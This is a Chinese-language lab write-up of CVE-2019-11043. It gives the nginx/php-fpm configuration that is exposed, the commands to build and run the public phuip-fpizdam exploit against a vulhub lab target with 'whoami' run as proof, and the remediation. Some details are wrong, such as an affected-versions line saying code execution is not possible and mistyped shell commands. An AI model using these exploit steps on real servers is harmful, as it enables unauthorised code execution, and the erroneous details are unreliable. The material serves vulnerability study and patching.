CVE-2019-11043 php-fpm和nginx RCE漏洞复现

漏洞概述

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时，会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下，存在逻辑缺陷。攻击者通过精心的构造和利用，可以导致远程代码执行。

---

影响版本

Nginx + php-fpm 的服务器，在使用如下配置的情况下，都可能存在远程代码执行漏洞。
不可以远程代码执行：PHP 7.0/7.1/7.2/7.3

location ~ [^/]\.php(/|$) {
        ···
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO       $fastcgi_path_info;
        fastcgi_pass   php:9000;
        ...
  }
}

---

漏洞复现

vulhub 靶机一台：192.168.56.136
kali 攻击机一台：192.168.56.133

环境启动

cd vulhub/php/CVE-2019-11043/
docker-compose up -d

Web访问如下：

---

代码执行

1．kali需按照go语言环境，如已安装好 go 语言环境可跳过此步骤。
访问：go语言环境下载
-下载二进制包：go.1.4.linux-amd64.tar.gz

-将下载的二进制包解压至 /usr/local 目录下。

tar -C /usr/loacl -zxf go.1.4.linux-amd64.tar.gz

-将 /usr/local/go/bin 目录添加至PATH环境变量。

export PATH-$PATH:/usr/local/go/bin

2．下载命令执行的POC

git clone https://github.com/neex/phuip-fpizdam  //下载POC
cd /phuip-fpizdam
go build    //go build 进行编译
ls  //出现phuip-fpizdam 可执行文件为编译成功

注：如果编译失败，显示timeout，需要挂代理，然后执行以下语言添加关机变量。

export GOPROXY=https://goproxy.io

3．使用phuip-fpizdam发送数据包，同时访问web页面。

./phuip-fpizdam http://192.168.56.136:8080/index.php

访问：http://192.168.56.136:8080/index.php?a=whoami
命令执行成功：

注：如果命令没有执行成功，需多访问几次，因为php-fpm会启动多个子进程，以访问到被污染的进程。

---

漏洞修复

• 在不影响正常业务的情况下，删除 Nginx 配置文件中的如下配置：

fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO  $fastcgi_path_info;

• 漏洞补丁：

https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest

---

参考文章：
Timeline Sec 微信公众号漏洞复现文章合集